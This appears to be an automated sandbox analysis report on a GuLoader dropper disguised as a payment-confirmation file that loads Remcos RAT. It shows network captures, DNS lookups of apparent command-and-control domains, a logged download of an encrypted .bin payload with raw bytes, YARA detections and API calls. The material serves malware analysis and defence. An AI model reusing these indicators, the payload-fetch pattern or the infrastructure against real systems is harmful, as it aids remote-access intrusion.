Jan 14, 2025 16:35:31.194744110 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.194948912 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.194996119 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.195236921 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.195290089 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.195468903 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.195518970 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.195621967 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.195669889 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.222136974 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.222234011 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.222369909 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.222430944 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.222640038 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.222791910 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.254769087 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.254863024 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.254925966 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.255171061 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.283838987 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.283935070 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.283961058 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.284034967 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.287950039 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.287976980 CET	443	49977	109.99.162.14	192.168.2.5
Jan 14, 2025 16:35:31.287991047 CET	49977	443	192.168.2.5	109.99.162.14
Jan 14, 2025 16:35:31.288053989 CET	49977	443	192.168.2.5	109.99.162.14

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 14, 2025 16:35:28.994465113 CET	60904	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:35:29.076786995 CET	53	60904	1.1.1.1	192.168.2.5
Jan 14, 2025 16:35:36.337263107 CET	61071	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:35:36.346045971 CET	53	61071	1.1.1.1	192.168.2.5
Jan 14, 2025 16:35:36.348856926 CET	52512	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:35:36.357809067 CET	53	52512	1.1.1.1	192.168.2.5
Jan 14, 2025 16:35:41.438180923 CET	57405	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:35:41.447666883 CET	53	57405	1.1.1.1	192.168.2.5
Jan 14, 2025 16:35:46.562529087 CET	63043	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:35:46.571069002 CET	53	63043	1.1.1.1	192.168.2.5
Jan 14, 2025 16:35:51.641431093 CET	54249	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:35:51.650302887 CET	53	54249	1.1.1.1	192.168.2.5
Jan 14, 2025 16:35:56.718673944 CET	64762	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:35:56.727998018 CET	53	64762	1.1.1.1	192.168.2.5
Jan 14, 2025 16:36:01.797347069 CET	49288	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:36:01.807074070 CET	53	49288	1.1.1.1	192.168.2.5
Jan 14, 2025 16:36:06.875241041 CET	57747	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:36:06.957660913 CET	53	57747	1.1.1.1	192.168.2.5
Jan 14, 2025 16:36:12.751087904 CET	55810	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:36:12.759980917 CET	53	55810	1.1.1.1	192.168.2.5
Jan 14, 2025 16:36:17.468861103 CET	53885	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:36:17.478437901 CET	53	53885	1.1.1.1	192.168.2.5
Jan 14, 2025 16:36:22.452796936 CET	55152	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:36:22.462223053 CET	53	55152	1.1.1.1	192.168.2.5
Jan 14, 2025 16:36:27.077752113 CET	62643	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:36:27.086556911 CET	53	62643	1.1.1.1	192.168.2.5
Jan 14, 2025 16:36:31.984945059 CET	53649	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:36:31.994143009 CET	53	53649	1.1.1.1	192.168.2.5
Jan 14, 2025 16:36:36.970072031 CET	53726	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:36:36.983019114 CET	53	53726	1.1.1.1	192.168.2.5
Jan 14, 2025 16:36:41.935609102 CET	63907	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:36:41.945909023 CET	53	63907	1.1.1.1	192.168.2.5
Jan 14, 2025 16:36:46.935774088 CET	62432	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:36:46.944694042 CET	53	62432	1.1.1.1	192.168.2.5
Jan 14, 2025 16:36:51.936969995 CET	53544	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:36:51.946235895 CET	53	53544	1.1.1.1	192.168.2.5
Jan 14, 2025 16:36:56.941637039 CET	56340	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:36:56.950118065 CET	53	56340	1.1.1.1	192.168.2.5
Jan 14, 2025 16:37:01.939055920 CET	51298	53	192.168.2.5	1.1.1.1
Jan 14, 2025 16:37:01.948617935 CET	53	51298	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 14, 2025 16:35:28.994465113 CET	192.168.2.5	1.1.1.1	0x9132	Standard query (0)	teldrum.ro	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:35:36.337263107 CET	192.168.2.5	1.1.1.1	0x94b8	Standard query (0)	linktreewealth.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:35:36.348856926 CET	192.168.2.5	1.1.1.1	0x6f96	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:35:41.438180923 CET	192.168.2.5	1.1.1.1	0xf81e	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:35:46.562529087 CET	192.168.2.5	1.1.1.1	0x7166	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:35:51.641431093 CET	192.168.2.5	1.1.1.1	0x57a6	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:35:56.718673944 CET	192.168.2.5	1.1.1.1	0xd77e	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:36:01.797347069 CET	192.168.2.5	1.1.1.1	0xca9e	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:36:06.875241041 CET	192.168.2.5	1.1.1.1	0x6225	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:36:12.751087904 CET	192.168.2.5	1.1.1.1	0x79da	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:36:17.468861103 CET	192.168.2.5	1.1.1.1	0xe1d7	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:36:22.452796936 CET	192.168.2.5	1.1.1.1	0xd52	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:36:27.077752113 CET	192.168.2.5	1.1.1.1	0x2997	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:36:31.984945059 CET	192.168.2.5	1.1.1.1	0x77bb	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:36:36.970072031 CET	192.168.2.5	1.1.1.1	0x7a1e	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:36:41.935609102 CET	192.168.2.5	1.1.1.1	0x4449	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:36:46.935774088 CET	192.168.2.5	1.1.1.1	0x2a78	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:36:51.936969995 CET	192.168.2.5	1.1.1.1	0x4874	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:36:56.941637039 CET	192.168.2.5	1.1.1.1	0x9c57	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:37:01.939055920 CET	192.168.2.5	1.1.1.1	0x8574	Standard query (0)	linktreewealthy.zapto.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 14, 2025 16:35:29.076786995 CET	1.1.1.1	192.168.2.5	0x9132	No error (0)	teldrum.ro		109.99.162.14	A (IP address)	IN (0x0001)	false
Jan 14, 2025 16:35:36.346045971 CET	1.1.1.1	192.168.2.5	0x94b8	No error (0)	linktreewealth.zapto.org		0.0.0.0	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

teldrum.ro

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49977	109.99.162.14	443	5888	C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 15:35:30 UTC	173	OUT	GET /NJrdZqNcCtz102.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: teldrum.ro Cache-Control: no-cache
2025-01-14 15:35:30 UTC	223	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 15:35:30 GMT Server: Apache Last-Modified: Mon, 13 Jan 2025 20:36:39 GMT Accept-Ranges: bytes Content-Length: 493632 Connection: close Content-Type: application/octet-stream
2025-01-14 15:35:30 UTC	7969	IN	Data Raw: 7c cd 41 88 f3 aa b9 07 43 9f e2 63 1a 47 c0 99 31 f6 fb dd 98 80 55 65 a7 3c 37 0d 1d c9 47 fe 3b 7b 83 83 8b 95 f6 6d 84 04 cf 6b 56 6c 14 ef e6 62 6a 1b 24 de 29 fd 65 9d da 35 73 99 e0 3b e3 64 d9 d6 0b 86 83 14 68 d8 e0 b2 71 08 bb eb 3f b2 62 d1 c7 75 5f 29 f3 08 48 8e 63 dd b2 49 43 5d 51 bf b9 8a 67 bc bc 96 79 ae f3 18 ed fb c1 77 64 3d 94 2f ed 87 5d 08 71 1e ac 12 a9 4f 7e f6 2b bc 12 74 fb 4f d2 b0 1b 55 d7 e6 5a 1b ee ab 6e 5a bf 78 48 59 e7 8c b6 10 26 c5 e7 f3 13 33 03 d8 c0 69 ac 98 f1 0c 97 0f 65 30 a8 48 cf 5a f1 85 13 86 2b 0e 4c 0b 2a f8 12 3d cd 6d d1 d5 8e 28 37 d4 0c 7a 57 8e 4f 0f 20 d0 03 36 e7 ef 39 b3 65 fb 8e eb 51 8b 00 6c e4 24 1e 3b e1 f0 e7 99 2f 1f 74 43 d5 8d 49 43 6a 86 fa 0d 53 43 da 6a 0d 59 35 99 86 b3 4c 7d 52 02 d1 Data Ascii: \|ACcG1Ue<7G;{mkVlbj$)e5s;dhq?bu_)HcIC]Qgywd=/]qO~+tOUZnZxHY&3ie0HZ+L*=m(7zWO 69eQl$;/tCICjSCjY5L}R
2025-01-14 15:35:30 UTC	8000	IN	Data Raw: 14 7f ba 45 09 92 32 0f ea 33 6d d8 1a 88 94 cd 80 d9 de 78 1c 70 47 04 b3 85 ac 5c c4 03 ff 34 19 85 30 5a 54 a9 fc 6f f4 f5 4e 6c ab c8 ed 80 c3 51 93 da 8f 94 b5 96 ef 0d 3c 87 f0 60 c8 d0 72 ed 77 b1 ba 93 a2 bd a9 e7 c4 16 88 34 03 a0 68 16 25 bd 91 6a 01 6b ce d5 68 fa 35 f0 34 47 02 c0 86 37 e3 db 86 a7 f6 1b ea 4c 22 e1 9c ec dc 2f 0b 5c db fe 86 9c a2 3f 12 ec 92 13 7c 9d 90 4a 66 cd 42 d6 99 ca 08 a1 bd 46 6d 96 6e 7b 1d 6e 6f 92 22 af 5d 14 fc 39 99 cd 0d 7a a1 3e db 3d 2d e6 9d a0 aa 53 e8 7f 27 06 79 35 41 35 6d b3 49 68 8c 71 17 2f 03 99 00 3a c3 94 18 70 b8 f2 d5 33 13 bd 41 77 71 f9 37 31 ac 06 9c 5b 65 1c 03 7b fd 5d aa 1b db 42 96 69 e1 81 f8 e2 75 ec 13 a3 cb 8a 04 1a 10 d8 55 03 e9 f8 eb 66 56 7b f5 da cd 49 08 03 4c d6 ff cc c6 31 ca Data Ascii: E23mxpG\40ZToNlQ<`rw4h%jkh54G7L"/\?\|JfBFmn{no"]9z>=-S'y5A5mIhq/:p3Awq71[e{]BiuUfV{IL1
2025-01-14 15:35:30 UTC	8000	IN	Data Raw: 1d 99 73 43 23 e8 b2 91 f3 06 0d a9 1d 75 98 f2 f3 8c 70 3a 7b 6b ef b1 8a e6 f5 13 19 7c b8 59 2d 4e 0c 0d d7 06 be 96 e0 6c 06 51 10 83 80 75 2c a1 13 99 ef 74 59 fb 19 54 8c d2 c1 15 c5 93 b3 b2 85 88 d2 fc bf 72 e5 bb 88 20 3a e4 b7 d6 00 91 c5 d9 7d 6f 91 1a 7f dd 13 84 10 2a 40 be 17 88 53 a7 f7 a2 b6 0e 28 cd c9 e7 d6 df 0c 29 2d 01 49 e3 c1 eb 6d 4c 9d 70 41 c5 64 eb b1 45 23 fc 63 49 c9 84 44 9a 92 d0 0d 51 ed 19 11 e6 c2 80 89 4d f9 bb 50 c4 19 66 92 aa e8 e2 87 2b 1a 4b f7 92 6d 70 f3 5d 91 89 33 22 10 24 55 c3 70 f3 9a c5 b7 fd c1 a9 49 6b f8 d0 db bd d4 36 45 f6 5f db 79 8d ca aa 9c a4 27 9e 85 97 63 f9 8b 23 7a 00 8d fe 2d 22 33 e8 26 d1 9f 4b ec f4 ce 5b c8 a3 d1 64 3e 65 4e f7 7a 30 22 f8 20 fd e6 7e 33 85 54 c9 df 40 16 5e 1c 2a ec 15 64 Data Ascii: sC#up:{k\|Y-NlQu,tYTr :}o@S()-ImLpAdE#cIDQMPf+Kmp]3"$UpIk6E_y'c#z-"3&K[d>eNz0" ~3T@^d
2025-01-14 15:35:30 UTC	8000	IN	Data Raw: e3 20 b1 06 5b 94 71 65 e9 ba 28 b3 50 80 36 e6 26 4b b4 36 a0 ab 64 ff 63 32 8e d4 61 bc b7 dd 4f 9d 09 da 48 ea 83 1b 49 74 33 ad 32 6b 05 69 b1 61 8c 07 ba 74 57 ff 19 5d 5b f0 bc 27 06 89 42 d9 e2 88 b0 eb 05 36 57 d5 0e fe 56 b7 d3 86 2c ef 87 bc 5a 1b ac be 8b 44 1f ae 0d 28 7a fe de 66 1c 85 65 92 9b 86 a0 9c f9 7d 2b 42 b0 d8 f1 d8 30 bb d6 a8 98 05 5e 39 f4 e0 e5 25 7f d8 e4 c4 82 3a b5 64 81 35 78 85 d6 c6 d1 0b 74 4c 0b 26 6e 51 03 2a f0 f7 2b 8d 80 7f 0b 24 ff 65 7c 37 d9 7a c1 b0 4b 1c 69 4d 0f 92 3c c5 c7 71 f9 fe fa d5 5d b2 65 33 7c 50 74 61 78 51 6f db f3 5b 2d 1b 2e e5 13 67 71 c7 72 80 f6 c4 36 aa 40 dd d2 35 80 a9 ec fd dd e8 94 93 c3 32 bf 77 c3 e6 af df d7 e0 74 6f ef 9c d1 1c c7 8d 02 3b 6b 28 22 41 19 25 cb 6b aa e4 28 4e 27 64 a1 Data Ascii: [qe(P6&K6dc2aOHIt32kiatW]['B6WV,ZD(zfe}+B0^9%:d5xtL&nQ*+$e\|7zKiM<q]e3\|PtaxQo[-.gqr6@52wto;k("A%k(N'd
2025-01-14 15:35:30 UTC	8000	IN	Data Raw: 7f 8d df 74 cd 00 10 39 15 3c 84 c7 84 9c 29 2b 11 22 45 b2 31 27 5f 50 be 5b 34 ef 2b dc be 71 9a e5 60 bf b3 2c 9b 42 9f 6c 58 03 a8 89 65 22 b0 b9 a3 f9 29 f7 93 6c bb 4d 57 b2 09 d6 9e 99 aa e4 ba e5 30 55 99 4e d8 84 28 7f d0 6d 53 c5 b5 18 e7 c7 67 fa 38 fb dd 6d 03 6d 18 ba fe 2b 42 14 24 60 9e 1e ed a2 c6 82 2d 21 22 0b e9 65 b3 30 55 0b 23 72 ed 23 ba f7 be c1 7c 4b 91 dd 2f 5c ec 66 cc 00 ee c2 22 48 70 5f e1 0b 7f 9b 1d f9 ba 1b a4 a2 f6 cc 26 9d 4e 04 fd 30 91 bc bc 20 d6 f7 e8 69 b1 a5 a3 2d d5 62 0c 7b d7 74 a9 b6 36 35 37 6f 15 7d e0 9e 3c 09 bd 6a 5c 16 15 1f e4 25 ee 4e 4c 39 62 06 3d 40 ac 9e 66 9a 75 bf b9 a4 9c a9 19 f1 9d 30 b8 69 a7 79 ae 14 f8 72 1b 49 a7 94 0e 3d a1 78 f6 75 ec 65 ae 79 4d 19 f3 6c c0 f2 b7 a8 2d 93 b4 c6 b8 f8 09 Data Ascii: t9<)+"E1'_P[4+q`,BlXe")lMW0UN(mSg8mm+B$`-!"e0U#r#\|K/\f"Hp_&N0 i-b{t657o}<j\%NL9b=@fu0iyrI=xueyMl-
2025-01-14 15:35:30 UTC	8000	IN	Data Raw: 56 98 2e 6e 4e b8 92 f3 84 a4 48 f2 82 26 98 03 e0 19 59 53 59 0e 60 85 86 7f b2 d6 f2 3b 40 28 65 7a b5 15 bf 06 d9 09 a2 8b 2d 09 68 ea cb 01 ed 5a 40 f2 4b 75 b2 da e7 a4 ec a3 35 46 65 ba df d9 75 0e 75 9f ae b3 04 3e e0 3c f5 eb 93 5b 0c aa 05 3b ec 03 ac c5 9d 2e 44 99 47 a2 7f 60 1c ea 25 dd 5a 55 34 a2 ae 57 fb 8a 66 bc 3f 52 49 68 b5 51 ed 7b bf 3d 64 48 84 ac d3 87 29 03 8e 28 5b 06 39 cc 35 e9 12 94 12 70 f3 69 f1 3a da 46 44 0e cd 26 0c 34 cd c6 8d 41 78 a6 c3 11 1d 8a 17 54 9c 40 e5 56 61 30 a5 13 63 ee bd 23 f9 47 a5 14 bd 68 f2 b8 d8 20 d5 b6 2e 04 68 52 a1 28 9f 70 15 85 09 7c c6 73 d6 cc 58 c0 e7 2e f5 8d 67 67 57 8c 33 d3 47 31 31 4c da 51 9d b7 64 ee 08 93 4a 81 e5 cc e7 14 76 a8 20 b0 21 d9 14 b4 d3 9e cb 38 74 a8 c4 c4 b8 a6 a1 92 e7 Data Ascii: V.nNH&YSY`;@(ez-hZ@Ku5Feuu><[;.DG`%ZU4Wf?RIhQ{=dH)([95pi:FD&4AxT@Va0c#Gh .hR(p\|sX.ggW3G11LQdJv !8t
2025-01-14 15:35:30 UTC	8000	IN	Data Raw: c5 05 3d 3b 77 e5 ab 9e 85 41 f4 35 46 ad 80 5c 27 0e c9 07 23 34 d6 b7 63 95 67 b7 b1 91 3f ef 7f ff cb 91 cc e4 9f dc 99 d7 c1 38 2f 5d 2a bc d0 a6 36 8c c2 53 d6 e4 fd 32 28 c6 b5 16 a9 a9 af af 84 b6 2b 70 3f 39 4b 99 c8 1a 72 f2 a7 7d c0 2e 7a 25 3a 7f 15 24 29 b5 7a cc 75 93 8b 16 07 bd 44 23 f9 55 ef 22 11 ca 38 32 a2 2a b7 9b 31 60 5d 3d c2 a1 e5 1d 1a 72 e6 8f 6b b6 17 e3 0c 31 da c2 ce e6 29 31 2f f6 39 40 be 92 f9 5d d6 27 a0 a4 47 45 ee b2 a4 b4 3c da 8e 6b 66 82 9e a1 4e f9 21 0a a5 83 01 9a ae 53 aa 21 88 99 c7 ad 98 ac 1a a8 3f cb 04 64 c9 ea 4a 2e 85 34 36 31 8e a8 c9 8d 17 dc ec 67 fd c5 03 e0 7b 1c dd 69 77 26 2c 62 16 be 68 03 32 b8 17 a7 14 ff 07 74 04 77 63 a0 30 ab 42 6f 33 6a 33 44 c8 b1 d6 c7 3c 84 a8 4f 83 03 ca 4d 57 24 58 92 6f Data Ascii: =;wA5F\'#4cg?8/]6S2(+p?9Kr}.z%:$)zuD#U"821`]=rk1)1/9@]'GE<kfN!S!?dJ.461g{iw&,bh2twc0Bo3j3D<OMW$Xo
2025-01-14 15:35:30 UTC	8000	IN	Data Raw: e6 b7 0d 40 8b 1e d8 64 6c d9 a2 d6 72 bd 50 85 29 57 23 a8 f7 4d 56 51 67 ff 06 88 a0 83 5f 65 f0 f8 fa 19 6a fb f3 9b 97 b5 30 da e0 34 bc 86 43 62 50 0d 98 a4 49 5b e4 ac 8d 19 a9 79 5b d7 09 ec f8 3c 05 93 f3 33 1b 7f f3 4d 11 6d 44 c1 12 f1 00 a2 90 41 4d 0c 00 49 0b d7 d2 54 b6 d8 7e 71 83 65 e9 42 89 b6 8c 9c 5d 40 66 6c 12 8c 8d 8e 16 05 fb 7d 5e 9f 0b 78 32 92 17 d2 f5 44 0f b2 71 1f 1d 71 e1 85 2c 23 4e 49 f3 84 c6 28 da 50 62 49 97 8e 70 74 fd d8 09 df 66 6c 07 4a b4 80 fb af 92 85 9a 18 f7 df b0 81 fc f9 6a 4f 30 57 43 36 a6 ab 93 39 15 7a 89 87 76 e8 aa d4 76 0e 3b 96 3c c0 0b d9 14 94 a3 3b e0 e4 57 08 08 87 9a 35 bb ef 80 5c f5 53 6c d5 8b ed 80 cb 58 38 c2 4e 69 40 69 7a 80 8d 93 d5 a6 a9 c8 ef 33 34 b5 1a 3f 37 41 ad e6 1c bd f0 1f 79 73 Data Ascii: @dlrP)W#MVQg_ej04CbPI[y[<3MmDAMIT~qeB]@fl}^x2Dqq,#NI(PbIptflJjO0WC69zvv;<;W5\SlX8Ni@iz34?7Ays
2025-01-14 15:35:30 UTC	8000	IN	Data Raw: f1 54 97 8d 24 06 d5 1c 60 45 f2 66 ee 49 f5 64 db 33 93 03 7c 25 b1 59 98 b4 3a 26 56 a6 3f 9a 3a f3 1e aa 4f 76 dc 87 e4 c3 ad a4 ac 05 aa 86 e2 cc a1 f0 20 3b a0 98 c5 02 25 21 8b ef 0b 50 d7 91 c9 a3 83 22 a9 02 f8 d5 97 17 85 0e 0b 0d 5b b9 d2 3c 9c c3 14 19 72 39 c9 6c 32 67 99 d7 91 5b f7 19 31 65 53 93 68 02 d2 b6 94 3a b2 be c1 9e 1a 72 0b d8 29 4d 2e 6a 6c 54 cf ac ba 5d 65 d6 fc 9d 9d 74 4a e4 c7 7f 57 29 f4 1f 13 1d 21 7c c0 f2 0b d0 0c 50 74 f1 73 e3 68 3b fa bf 33 bc 89 58 6f 66 fc 64 d7 f7 93 05 2e e3 99 8e 4a 3e 67 ac c4 b0 0b 40 dd a0 0d 80 91 8f 8a 2d 76 a3 e1 70 4f f7 60 c9 da 5c ab 46 56 c5 19 4b e8 bf 17 15 02 ca 24 b7 0b f3 ca 82 bf 7c 5d 51 1b ec 97 41 93 23 6d 3e ad 24 c7 89 6c 29 6f 14 88 4f ab 52 43 39 43 18 5f 0a 65 3a 54 9b 01 Data Ascii: T$`EfId3\|%Y:&V?:Ov ;%!P"[<r9l2g[1eSh:r)M.jlT]etJW)!\|Ptsh;3Xofd.J>g@-vpO`\FVK$\|]QA#m>$l)oORC9C_e:T
2025-01-14 15:35:30 UTC	8000	IN	Data Raw: bf e7 84 d7 32 13 db 41 22 ad 47 26 44 8c 21 ed 4a 2c 45 f5 71 bd 43 2d 7b 48 ee 56 66 a4 d5 90 28 1c 67 4f d9 97 f5 42 bc 53 91 8c c2 2f 4b a2 4e 56 7e fa ed 5a 96 e2 ae bc 7d f0 05 da 70 56 16 24 62 97 53 fe 59 81 59 89 28 52 bb 45 d7 f1 e1 e1 e3 86 37 c1 e5 ba 67 dc f5 f3 8f 43 64 ba 53 c3 82 7f 3c 48 a9 3c 8e c6 cf 91 ec 56 cc 2b df 1d 7b cf f4 5d ed 69 8a 92 90 17 0b 0b 32 2a 27 b1 d8 6d 12 5a d9 15 89 7f 83 d9 45 5a 5b 13 f6 dc 7a dc 68 3f 51 40 b5 42 4e 8c 5e 55 74 a6 75 99 ac 9f 86 f8 e8 01 e2 5b a1 94 97 df 3f 01 8a 32 53 5f ad 32 3d 88 de 65 c5 ea ff 6b 4b e2 a4 dc 2f f9 f0 6b 23 a3 a3 b7 58 65 98 8e 2a 09 b6 89 cf 20 6b 2a 28 67 ca be 5d 35 c4 71 cc 55 15 72 f3 ea 11 e1 c0 ef 91 a8 46 11 b0 17 b8 84 9c 5b 7f 96 50 8e 2e 4a 74 a1 81 98 67 be 56 Data Ascii: 2A"G&D!J,EqC-{HVf(gOBS/KNV~Z}pV$bSYY(RE7gCdS<H<V+{]i2'mZEZ[zh?Q@BN^Utu[?2S_2=ekK/k#Xe k*(g]5qUrF[P.JtgV

Target ID:	0
Start time:	10:32:57
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"
Imagebase:	0x400000
File size:	550'217 bytes
MD5 hash:	25EEC63EDF7C0EB8628A89712B5CB363
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.3536097614.0000000006D99000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:35:15
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"
Imagebase:	0x400000
File size:	550'217 bytes
MD5 hash:	25EEC63EDF7C0EB8628A89712B5CB363
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4630508505.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exePID: 4372, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	15.9%
Dynamic/Decrypted Code Coverage:	13.4%
Signature Coverage:	15.9%
Total number of Nodes:	1608
Total number of Limit Nodes:	35

Executed Functions

Function 00403645 Relevance: 88.0, APIs: 32, Strings: 18, Instructions: 464
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403668
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00403693
GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 004036A6
lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 0040373F
#17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040377C
OleInitialize.OLE32(00000000), ref: 00403783
SHGetFileInfoW.SHELL32(00420F08,00000000,?,000002B4,00000000), ref: 004037A2
GetCommandLineW.KERNEL32(00428A60,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037B7
CharNextW.USER32(00000000,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",00000020,"C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe",00000000,?,00000008,0000000A,0000000C), ref: 004037F0
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403928
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403939
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403945
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403959
